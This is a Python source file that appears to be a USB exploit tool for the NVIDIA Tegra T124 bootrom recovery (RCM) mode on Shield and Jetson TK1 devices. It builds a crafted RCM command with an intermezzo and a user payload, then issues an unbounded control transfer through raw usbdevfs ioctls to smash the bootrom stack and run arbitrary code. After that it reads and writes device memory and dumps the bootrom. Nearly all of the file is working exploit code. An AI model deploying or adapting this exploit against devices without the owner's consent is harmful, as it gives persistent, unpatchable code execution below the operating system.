from io import BytesIO
import usb.core
import usb.util
import sys
import struct
from tools import *
import argparse
import ctypes
import time
import fcntl
import platform
import os
from patches import *

IS_OSX = platform.system() == "Darwin"
USBDEVFS_URB_TYPE_CONTROL = 2
USBDEVFS_SUBMITURB = 0x8038550a
USBDEVFS_REAPURB = 0x4008550c
USBDEVFS_DISCARDURB = 0x0000550b

debug_exchanges = 0
class DEVICE():
    def usb_connect(self):
        self.dev = None
        while self.dev is None:
            if self.dev is None:
                self.dev = usb.core.find(idVendor=SHIELD_TK1_VID, idProduct=SHIELD_TK1_PID)
            if self.dev is None:
                self.dev = usb.core.find(idVendor=JETSON_TK1_VID, idProduct=JETSON_TK1_PID)
        
        if self.dev is None:
            error("Could not find APX device!")
            sys.exit(ERROR_STATUS)
        
        while(True):
            try:
                self.dev.detach_kernel_driver(interface=0)
            except Exception as e:
                if(e.errno == 2):
                    break
                pass

    def usb_read(self, size, title="recv data"):
        IN = 0x81
        data = self.dev.read(IN, size)
        data = bytes([char for char in data])
        if debug_exchanges == 1:
            hexdump(data, title=title)
        return data

    def usb_write(self, data):
        OUT = 0x1
        self.dev.write(OUT, data) # Some timeout
        if debug_exchanges == 1:
            hexdump(data, color=5, title="out")

    def usb_reset(self):
        self.dev.reset()

    def __init__(self):
        self.usb_connect()
        self.write = self.usb_write
        self.read = self.usb_read

    def read_chip_id(self):
        r = self.usb_read(0x10)
        info(f"Chip id: {r.hex()}")

# lol
def get_fds():
    return set(int(i) for i in os.listdir("/proc/self/fd"))  

class TegraRCM():
    def ep0_read_unbounded(self, size):
        print("Size: 0x%x\n" % size)
        if IS_OSX:
            try:
                s.dev.ctrl_transfer(0x82, 0, 0, 0, size)
            except usb.core.USBError:
                print("timeout.. good!")
                return
        buf = ctypes.create_string_buffer(struct.pack("@BBHHH%dx" % size, 0x82, 0, 0, 0, size))
        print(bytes(buf[:8]).hex())
        urb = ctypes.create_string_buffer(struct.pack("@BBiIPiiiiiIP1024x",
                          USBDEVFS_URB_TYPE_CONTROL, 0, # type, ep
                          0, 0, # status, flags
                          ctypes.addressof(buf), len(buf), 0, # buf, len, actual
                          0, 0, 0, 0, 0xf0f))
        print(bytes(urb[:-1024]).hex())
        print("URB address: 0x%x" % ctypes.addressof(urb))

        for fd in self.fds:
            try:
                fcntl.ioctl(fd, USBDEVFS_SUBMITURB, urb)
                # time.sleep(0.1)
                fcntl.ioctl(fd, USBDEVFS_DISCARDURB, urb)
                purb = ctypes.c_void_p()
                fcntl.ioctl(fd, USBDEVFS_REAPURB, purb)
                if purb.value != ctypes.addressof(urb):
                    print("Reaped the wrong URB! addr 0x%x != 0x%x" % (
                        purb.value, ctypes.addressof(urb)))
                _, _, status, _, _, _, _, _, _, _, _, ctx = struct.unpack("@BBiIPiiiiiIP", urb[:56])
                print("URB status: %d" % status)
                if ctx != 0xf0f:
                    print("Reaped the wrong URB! ctx=0x%x" % ctx)
                # break
                info(f"Done on {fd}")
                return status
            except Exception as e:
                pass
                # print(str(e))
        return None

    def __init__(self):
        if not IS_OSX:
            fds_before = get_fds()
        self.dev = DEVICE()
        if not IS_OSX:
            self.fds = get_fds() - fds_before
            self.fd = sorted(list(self.fds))[-1]
            info("File descriptor: %d" % self.fd)


    def get_payload_aft_len(self, payload):
        payload.seek(0)
        sz = len(payload.read())
        payload.seek(0)
        if(sz > MAX_PAYLOAD_FILE_SIZE ):
            print(f"Payload to big!")
            sys.exit(ERROR_STATUS)
        payload_aft_len = 0 
        if sz > MAX_PAYLOAD_BEF_SIZE:
            payload_aft_len = sz - MAX_PAYLOAD_BEF_SIZE
        return payload_aft_len

    def read_intermezzo(self, rcm_cmd_buf : BytesIO):
        intermezzo = open("ShofEL2-for-T124/intermezzo.bin", "rb").read(INTERMEZZO_LEN)
        intermezzo_size = len(intermezzo)
        rcm_cmd_buf.seek(RCM_CMD_BUF_INTERMEZZO_START)
        rcm_cmd_buf.write(intermezzo)

    def read_payload_file(self, payload_file_fd, rcm_cmd_buf, rcm_cmd_buf_len):
        payload_bef = payload_file_fd.read(MAX_PAYLOAD_BEF_SIZE)
        rcm_cmd_buf.seek(RCM_CMD_BUF_PAYLOAD_START)
        rcm_cmd_buf.write(payload_bef)
        payload_bef_len = len(payload_bef)
        payload_aft_len = 0
        if(rcm_cmd_buf_len > RCM_CMD_BUF_PAYLOAD_CONT):
            payload_aft = payload_file_fd.read(rcm_cmd_buf_len - RCM_CMD_BUF_PAYLOAD_CONT)
            payload_aft_len = len(payload_aft)
            rcm_cmd_buf.seek(RCM_CMD_BUF_PAYLOAD_CONT)
            rcm_cmd_buf.write(payload_aft)

        payload_bef_len = struct.pack("<L", payload_bef_len)
        payload_aft_len = struct.pack("<L", payload_aft_len )
        rcm_cmd_buf.seek(RCM_CMD_BUF_PAYLOAD_BEF_LENVAR)
        rcm_cmd_buf.write(payload_bef_len)
        rcm_cmd_buf.seek(RCM_CMD_BUF_PAYLOAD_AFT_LENVAR)
        rcm_cmd_buf.write(payload_aft_len)        

    def build_rcm_cmd(self, payload_file_fd,  rcm_cmd_buf, rcm_cmd_buf_len, payload_thumb_mode ):
        ret = -1
        rcm_cmd_len = struct.pack("<L", RCM_CMD_LEN)
        payload_entry = struct.pack("<L", (BOOTROM_PAYLOAD_ENTRY | 0x1))
        payload_thumb_mode = struct.pack("<L", payload_thumb_mode)
        self.read_intermezzo(rcm_cmd_buf)
        self.read_payload_file(payload_file_fd, rcm_cmd_buf, rcm_cmd_buf_len)

        rcm_cmd_buf.seek(0)
        rcm_cmd_buf.write(rcm_cmd_len)
        rcm_cmd_buf.seek(RCM_CMD_BUF_MEMCPY_RET_ADD)
        rcm_cmd_buf.write(payload_entry)
        rcm_cmd_buf.seek(RCM_CMD_BUF_PAYLOAD_THUMB_MODE)
        rcm_cmd_buf.write(payload_thumb_mode)

    def send_rcm_cmd(self, payload_filename, payload_thumb_mode=1):
        status = -1
        payload_file_fd = open(payload_filename, "rb")

        payload_aft_len = self.get_payload_aft_len(payload_file_fd)
        if(payload_aft_len < 0):
            sys.exit(ERROR_STATUS)

        rcm_cmd_buf_len = RCM_CMD_BUF_PAYLOAD_CONT + payload_aft_len
        padding = 0x1000 - ( rcm_cmd_buf_len % 0x1000 )
        n_writes = ( rcm_cmd_buf_len + padding) / 0x1000
        if not (n_writes % 2):
            padding += 0x1000
        
        rcm_cmd_buf = BytesIO()
        rcm_cmd_buf.write(b'\x00' * (rcm_cmd_buf_len + padding))

        self.build_rcm_cmd(payload_file_fd, rcm_cmd_buf, rcm_cmd_buf_len, payload_thumb_mode)
        rcm_cmd_buf.seek(0)
        self.dev.write(rcm_cmd_buf.read())
        payload_file_fd.close()

    def send_payload(self, payload, thumb=1):
        '''
        Sends user specified payload to device
        '''
        self.send_rcm_cmd(payload, thumb)

        #Smash the stack
        status = self.ep0_read_unbounded(BOOTROM_SMASH_LEN)
        if(status == 0):
            error("wrong status returned!")

    def send_verify_cmd(self, cmd):
        self.dev.write(cmd)
        r = self.dev.read(0x200)
        if(r != cmd):
            error(f"Error on sending command! {r}")
            return False
        return True

    def handle_done(self):
        r = self.dev.read(0x200)
        if(r != b"done"):
            error("Error on writing vbar!")

    def memdump_region(self, offset, size):
        if(not self.send_verify_cmd(b"PEEK")):
            return
        mem_param = struct.pack('<LL', offset, size)
        self.dev.write(mem_param)
        received = b''
        blk_sz = 0x200
        while len(received) < size:
            if (remaining := size - len(received)) < 0x200:
                blk_sz = remaining
            d = self.dev.read(blk_sz)
            if len(d) == blk_sz:
                self.dev.write(b"ACK\x00")
            received += d
        self.handle_done()
        return received
    
    def memwrite_region(self, address, data, check=True):
        '''
        Write a blob of data to an address on the device. Sometimes this function has issues when writing more than 0x20 bytes of data

        Args:

            :param (int): address: Address to write to
            :param (bytes): data: Binary data to write to the device
            :param (Bool): check if data is really written by dumping the region and checking if it has changed
        '''
        size = len(data)
        if(check):
            before = self.memdump_region(address, size)

        if(not self.send_verify_cmd(b"POKE")):
            return
        mem_param = struct.pack('<II', address, size)
        self.dev.write(mem_param)

        while len(data) > 0:
            remaining = 0x200
            if(len(data) < 0x200):
                remaining = len(data)
            send = data[:remaining]
            data = data[remaining:]
            self.dev.write(send)
            message = self.dev.read(0x200)
            if(message != b"OK"):
                error("Error on writing data to device!")
                return
            self.dev.write(b"ACK\x00")
        self.handle_done()
        #Read back data
        if(check):
            after = self.memdump_region(address, size)
            if(after == before and send != before):
                error(f"Memory written succesfully, but no changes detected! | {hex(address)}")

    def search_bootrom(self):
        dumped = BytesIO()
        for i in range(0, 0x1000000, 0x10000):
            d = self.memdump_region(i, 0x10000)
            dumped.write(d)
            if(cpsr_to_r0_ins in d or r1_to_cpsr in d):
                info(f"Found cpsr instruction at {hex(i)}")
            print(".", end="")
        # info(f"dumped {hex(len(dumped))} data")

    def dump_bootrom(self):
        d = self.memdump_region(0x100000, 0x1000)
        if(True):
            pass
        
    def cmd_handler(self):
        while True:
            cmd = self.dev.read(0x200)
            if(cmd == b"cmd_handler"):
                self.memwrite_region(0x40000000, 0x100 * b"\xaa")
                self.search_bootrom()
                #dump memory
                self.dump_bootrom()
            

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("payload", help="Payload to send to the tablet")
    parser.add_argument("--ga", help="Prepare for GA", action="store_true")
    parser.add_argument("--ga_arm", help="Prepare for GA", action="store_true")

    args = parser.parse_args()
    rcm = TegraRCM()
    rcm.dev.read_chip_id()
    if args.ga_arm:
        args.ga = True
        rcm.send_payload(args.payload, thumb=0)
    else:
        rcm.send_payload(args.payload)
    if args.ga:
        d = rcm.dev.read(4)
        # d2 = rcm.dev.read(0x200)
        if d == b"GiAs": 
            ok("Device in GA debugger")
    else:
        rcm.cmd_handler()